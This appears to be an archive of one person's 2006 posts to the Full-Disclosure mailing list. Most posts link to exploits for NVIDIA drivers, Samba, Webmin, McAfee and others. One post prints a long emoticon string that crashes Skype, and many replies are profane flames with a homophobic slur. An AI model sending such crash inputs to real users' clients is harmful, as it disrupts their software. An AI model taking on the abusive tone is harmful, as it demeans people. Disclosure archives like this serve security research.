[Full-disclosure] NVIDIA Linux/BSD/Solaris Drivers Local Root Buffer Overflow

2006-10-16 Thread Alexander Hristov 
NVIDIA Linux/BSD/Solaris Drivers Local Root Buffer Overflow
 KNOWN VULNERABLE:
o NVIDIA Driver For Linux v8774
o NVIDIA Driver For Linux v8762

   PROBABLY VULNERABLE:
o NVIDIA Driver for FreeBSD
o NVIDIA Driver for Solaris
o Earlier versions

   KNOWN FIXED:
o None

http://securitydot.org/xpl/exploits/vulnerabilities/articles/1714/exploit.html
-- 
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Mcafee Network Agent (mcnasvc.exe) Remote DoS

2006-10-12 Thread Alexander Hristov 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1659/exploit.html
-- 
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Google Earth (kml & kmz files) buffer overflow

2006-10-12 Thread Alexander Hristov 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1660/exploit.html
-- 
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] George Bush appoints a 9 year old to be thechairperson of the Information Security Deportment

2006-08-27 Thread Alexander Hristov 

On 8/27/06, php0t <[EMAIL PROTECTED]> wrote:

This is probably the funnier part, whatever is causing it

"[ Illegal characters in file path:
/home/system/www/bbcone/listings/nav_today">"



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Thierry
Zoller
Sent: Sunday, August 27, 2006 10:13 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] George Bush appoints a 9 year old to be
thechairperson of the Information Security Deportment



XSS ;)



--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Samba Internal Data Structures DOS Vulnerability Exploit

2006-07-20 Thread Alexander Hristov 

Name : Samba Internal Data Structures DOS Vulnerability Exploit
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1175/exploit.html
Date :  2006-07-21
Vulnerability :
http://securitydot.net/vuln/exploits/vulnerabilities/articles/18014/vuln.html
PATCH : 
http://us4.samba.org/samba/ftp/patches/security/samba-3.0-CAN-2006-3403.patch
It might not work on some systems.
Enjoy
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Webmin / Usermin Arbitrary File Disclosure Vulnerability Perl

2006-07-14 Thread Alexander Hristov 

This time coded on perl
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html
Date :  2006-06-30
Patch : update to version 1.290
Advisory : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1164/exploit.html

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit

2006-07-09 Thread Alexander Hristov 

Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability exploit
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html
Date :  2006-06-30
Patch : update to version 1.290
Advisory : 
http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows Live Messenger 8.0 ( Contact List *.ctt ) Heap Overflow

2006-06-25 Thread Alexander Hristov 

Author:JAAScois
Date:  25.6.2006
Type:  Heap Overflow
Product:   http://live.com , http://messenger.msn.com
Patch: N/A
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1108/exploit.html
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] OpenOffice.org XSS

2006-06-13 Thread Alexander Hristov 

Author:XiON
Date:  JUN1406
Type:  XSS
Product:   http://www.openoffice.org/
Patch: N/A
Link : 
http://securitydot.net/xpl/exploits/vulnerabilities/articles/1060/exploit.html
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] n3td3v bashers on FD

2006-06-09 Thread Alexander Hristov 

Good point about symantec
On 6/3/06, n3td3v <[EMAIL PROTECTED]> wrote:

We're the biggest security group around, theres nothing you can say to
change that. We are professionals who work at the major dot-coms and
earn all the money, you people are just stupid. You call us lame but
look at you. None of you have released vulnerabilites. None of you are
at the cutting edge of hacking, we're at the frontline of new tactics
to hack application and network security. You guys are just the people
sitting and waiting for hackers to post code so you can write about us
on securityfocus.com and news.com. Joris Evers and Robert Lemos
(Symantec/CNET) are making money out of everything posted on this
list, thats why they are multi million dollar corporations. They hate
to see this list disrupted, because they can't make money while n3td3v
bashing activity is underway. They hate to see their profit margins
dipping, they don't like to see there mail box filled with propaganda
for the biggest international non-profit group around. They want us to
leave the list so they can make money from their software to sell to
people. We're seen as the enemy...
Not only do Symantec and CNET hate us, script kids hate us as well,
because while the bashing is going on, no one is posting "free exploit
code" for them to deface web sites with. Hahaha. The Script kids and
Symantec/ CNETare the ones who hate n3td3v, all the real hackers are
on the side of n3td3v, its all about money at the end of the day. The
people who can hack their own zero-day don't care if n3td3v posts to
FD or not, its only script kids and Symantec CNET who care, because
without FD, they wouldnt have any other source of information to know
whats going on. These people need FD, its like a life line to them, if
it wasn't for FD, Symantec wouldn't know what was going on and neither
would CNET, they wouldn't know what hackers were upto without FD and
Bugtraq list.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Howto filter n3td3v from your mail client

2006-04-01 Thread Alexander Hristov 
First u have to go to preferences then click on :

Gay filter on
Asshole filter on
Noob filter on
Kiddie filter on

Thats all

WARNING : U have to check all of them so the mail client can filter
n3td3v , otherwise youll receive mails

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Noise

2006-03-29 Thread Alexander Hristov 
Hey n3td3v have u ever consired brain surgery like brain
transplantation or something like that ? I think it might help ! Try
your favourite search engine yahoo for searching more info about that
ok ?

On 3/30/06, n3td3v <[EMAIL PROTECTED]> wrote:
>
> Lets hear your story then, I bet thats a lot more interesting, right? Lets
> see, you grew up in a balanced family and social background, went to private
> school, finished all your exams, went to univeristy, studied computer
> science etc and then had the big peice of paper to say you can analyise code
> and find vulnerabilities. Or you become the big router/network guy and can
> headoff the biggest DNS or DDoS attack the world can throw at you...lets
> hear your story, if you even have the confidence to expose that to the
> public...yet you think you can bash me. People with real knowledge of new
> methodology of hacking never came from university graduates, it has come
> from bored, unemployed folks, that people like you might describe as losers.
> But to be honest, you guys you discredit, are actually the guys keeping you
> in a job.
>
>
>
> On 3/30/06, Scott T. Cameron <[EMAIL PROTECTED]> wrote:
> > On Wed, Mar 29, 2006 at 11:56:48PM +0100, n3td3v wrote:
> > > I finished school 11 years ago, infact I left on my own accordance (when
> I
> > > was 14) because they were going to chuck me out of school anyway. I soon
> got
> > > involved in stealing cars, brekaing into houses, and taking goods from
> > > shops. All my criminal friends went to jail, I was the only one left. I
> > > started using computers to pass the time (when I was 18) when having "no
> one
> > > left to hang about with", and I used my knowledge of criminality to work
> out
> >
> > 
> >
> > Highly uninteresting.
> >
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] (no subject)

2006-03-27 Thread Alexander Hristov 
IM not saying the entire disk !
Only the partition u choose the torrent to be saved in has to be full
Like when u have 14 partitions and one of them is full i dont think
this is a problem ? So this is a security bug

On 3/27/06, Stan Bubrouski <[EMAIL PROTECTED]> wrote:
> This really doesn't seem like a security bug though... sure some site
> could target opera users and try to force them to download torrents,
> but when your disk is already full this sounds like the least of your
> problems...
>
> -sb
>
> On 3/27/06, Alexander Hristov <[EMAIL PROTECTED]> wrote:
> > Opera > 8.02 with torrent support cant handle not enough space on drive
> >
> > If your partition is full and u choose to save a torrent on this
> > partition opera will start using 100% of your cpu and momery and
> > eventually crash
> >
> > Tested with opera 9 p 2
> > --
> > Best Regards,
> > Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Opera > 8.02 with torrent support cant handle not enough space on drive

2006-03-27 Thread Alexander Hristov 
Opera > 8.02 with torrent support cant handle not enough space on drive

If your partition is full and u choose to save a torrent on this
partition opera will start using 100% of your cpu and momery and
eventually crash

Tested with opera 9 p 2
--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-24 Thread Alexander Hristov 
Im very surprised too

On 3/24/06, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> I would be suprised to see a law that says it is bad to give other
> peoples work away for free but ok to sell that work?
>
> Something doesn't smell right in France and its not the cheese.
>
> On Fri, 24 Mar 2006 10:16:06 -0800 "CIRT.DK Mailinglists"
> <[EMAIL PROTECTED]> wrote:
> >I would rather say that they are using the law as an excuse, since
>
> >they
> >could have gotten the DB with all the exploits host in another
> >country.
> >
> >Just my oppinion
> >
> >/Dennis
> >
> >-Original Message-
> >From: [EMAIL PROTECTED]
> >[mailto:[EMAIL PROTECTED] On Behalf Of
> >Juha-Matti
> >Laurio
> >Sent: Friday, March 24, 2006 6:14 PM
> >To: full-disclosure@lists.grok.org.uk
> >Subject: Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale
> >
> >FrSIRT is officially pointing to local laws now; their Exploits
> >section
> >redirects to the following statement
> >
> >"In conformity with applicable French laws prohibiting Full-
> >disclosure"
> >including link to the official legifrance.gouv.fr document.
> >
> >http://www.frsirt.com/exploits/
> >
> >- Juha-Matti
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> Concerned about your privacy? Instantly send FREE secure email, no account 
> required
> http://www.hushmail.com/send?l=480
>
> Get the best prices on SSL certificates from Hushmail
> https://www.hushssl.com?l=485
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Phun! Search

2006-03-24 Thread Alexander Hristov 
YEAH URE THE BEST
I think in the school u learn they call u geek right ? because u act
like u understand something ?
On 3/24/06, n3td3v <[EMAIL PROTECTED]> wrote:
> Read http://en.wikipedia.org/wiki/Hacktivism learn ;-)
>
>
>
> On 3/24/06, Alexander Hristov <[EMAIL PROTECTED]> wrote:
> > Im wondering when will u grow up and stop writing shits on FD ?
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Phun! Search

2006-03-23 Thread Alexander Hristov 
Im wondering when will u grow up and stop writing shits on FD ?

On 3/24/06, n3td3v <[EMAIL PROTECTED]> wrote:
> Lol, and even with your idea, that would open up a great Yahoo phishing
> vector. You mean "anyone" can edit a legitimate Yahoo webpage with the name
> "n3td3v" on it and have it cached on Yahoo servers. I believe thats called
> "DEFACEMENT" of a corporate webpage. Even with your idea, thats still
> headline news. Now wheres Robert Lemos and Joris Evers, or are they too
> scared to mention the 'n3td3v' alias on public news sites, yes they are.
>
>
>
> On 3/23/06, n3td3v <[EMAIL PROTECTED]> wrote:
> >
> > The document is cached on Yahoo Slurp, you explain that, smart guy ;-)
> >
> >
> > On 3/23/06, Bernhard Mueller <[EMAIL PROTECTED] > wrote:
> > > Hello,
> >
> >
> > >
> >
> > There's no need at all to cache anything at all.
> >
> >
> > Sorry to tell you, but there is no vulnerability involved here
> >
> >
> > --
> > Bernhard
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> >
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >


--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: FW: [Full-disclosure] Noise on the list

2006-03-21 Thread Alexander Hristov 
Its hard to be guy ah n3tshit ?

Bob Hacker wrote:

> i need help with resume for monster if gobbles out there plz send
> resume in sparc 64 asm !!!
> !Z
> n3tdev is my her0 with a zer0 !! YAY !! YAY ! LOOK IM ON FD AND YOUR
> READING THIS YAY !
> YAY ! YAY ! YAY YAY YAY YAY YAY YAY Leave the list alone you predator
> you !! YAY YAY
> this is alex's list he will morderate you with tcp wrappers YAY 
> he will filter his incoming subscriotion lists of 12 to 11 yay !
> n3td3v is my her0 YAY ! !! !! !Z !Z
> !Z !
> !Z
> !Z
>
>  
> On 3/21/06, *Alexander Hristov* <[EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>> wrote:
>
> NETSHITDEV OR WHATEVER JUST SHUT THE FUCK UP URE A STUPID ASSHOLE SHUT
> THE FUCK UP AND LEAVE THE LIST ALONE
>
> n3td3v wrote:
>
> > And the "experts" come on FD insulting the people who post info, and
> > then expect us to post more for you to learn about? Why don't
> you just
> > get back to your ac or maybe people will stop posting to FD.
> >
> > If you bite the hand that feeds you, you know what will happen.
> >
> >
> > On 3/21/06, *Michael Tewner* <[EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>
> > mailto:[EMAIL PROTECTED]>>> wrote:
> >
> > Ummm... This list is as much learning of vulnerabilities as
> posting
> > them. This is DISCLOSURE.
> >
> > n3td3v wrote:
> > > You've never released any vulnerabilities for Google,
> Yahoo, or any
> > > other vendor, yet you think you have more right to be here
> than the
> > > people you class as the "idiots".
> > >
> > > n3td3v
> > >
> > > On 3/21/06, *Edward Pearson* < [EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>
> > <mailto:[EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>>
> > >  <mailto:[EMAIL PROTECTED]>
> > <mailto:[EMAIL PROTECTED]
> <mailto:[EMAIL PROTECTED]>>>> wrote:
> > >
> > > My friend,
> > > I posted an e-mail about this kind of thing a few months
> > back. I was
> > > saddened to see no effect. I have something like 600
> unread
> > e-mail
> > > in my
> > > FD box, I'd say around 200 of them MAY be worth reading.
> > >
> > > I used to love this list, I subscribe to Bugtraq now.
> Nuff said.
> > >
> > > Ed
> > >
> > >
> > >
> >
> 
>
> > >
> > > ___
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
>
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> <http://lists.grok.org.uk/full-disclosure-charter.html>
> >Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: FW: [Full-disclosure] Noise on the list

2006-03-21 Thread Alexander Hristov 
NETSHITDEV OR WHATEVER JUST SHUT THE FUCK UP URE A STUPID ASSHOLE SHUT
THE FUCK UP AND LEAVE THE LIST ALONE

n3td3v wrote:

> And the "experts" come on FD insulting the people who post info, and
> then expect us to post more for you to learn about? Why don't you just
> get back to your ac or maybe people will stop posting to FD.
>  
> If you bite the hand that feeds you, you know what will happen.
>
>  
> On 3/21/06, *Michael Tewner* <[EMAIL PROTECTED]
> > wrote:
>
> Ummm... This list is as much learning of vulnerabilities as posting
> them. This is DISCLOSURE.
>
> n3td3v wrote:
> > You've never released any vulnerabilities for Google, Yahoo, or any
> > other vendor, yet you think you have more right to be here than the
> > people you class as the "idiots".
> >
> > n3td3v
> >
> > On 3/21/06, *Edward Pearson* <[EMAIL PROTECTED]
> 
> >  >> wrote:
> >
> > My friend,
> > I posted an e-mail about this kind of thing a few months
> back. I was
> > saddened to see no effect. I have something like 600 unread
> e-mail
> > in my
> > FD box, I'd say around 200 of them MAY be worth reading.
> >
> > I used to love this list, I subscribe to Bugtraq now. Nuff said.
> >
> > Ed
> >
> >
> >
> 
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Links to Google's cache of 626 FrSIRT exploits

2006-03-20 Thread Alexander Hristov 
U can check and http://securitydot.net/exploits.php

[EMAIL PROTECTED] wrote:

>So you never recursively sucked FrSIRT.com before the public exploits section 
>was "definitively closed" well we're in luck (at least for a little while) 
>because Google did.
>
>This page links to Google's cache of 626 FrSIRT exploits
>
>http://www.elsenot.com/frsirt-google.html
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
>
>  
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Skype emoticons problems and vulnerabilities

2006-03-11 Thread Alexander Hristov 
Affected versions : 1.x ( not tested on 2.x )
Skype is vulnerable to dos using the emoticons when u do a bigger
enough list of them like this :
":D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D:D"

--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Skype emoticons problems / bugs

2006-03-06 Thread Alexander Hristov 
Skype 1.x ( havent tested on 2.x ) windows version has problems with
emoticons when there is a big enough list of them like this :
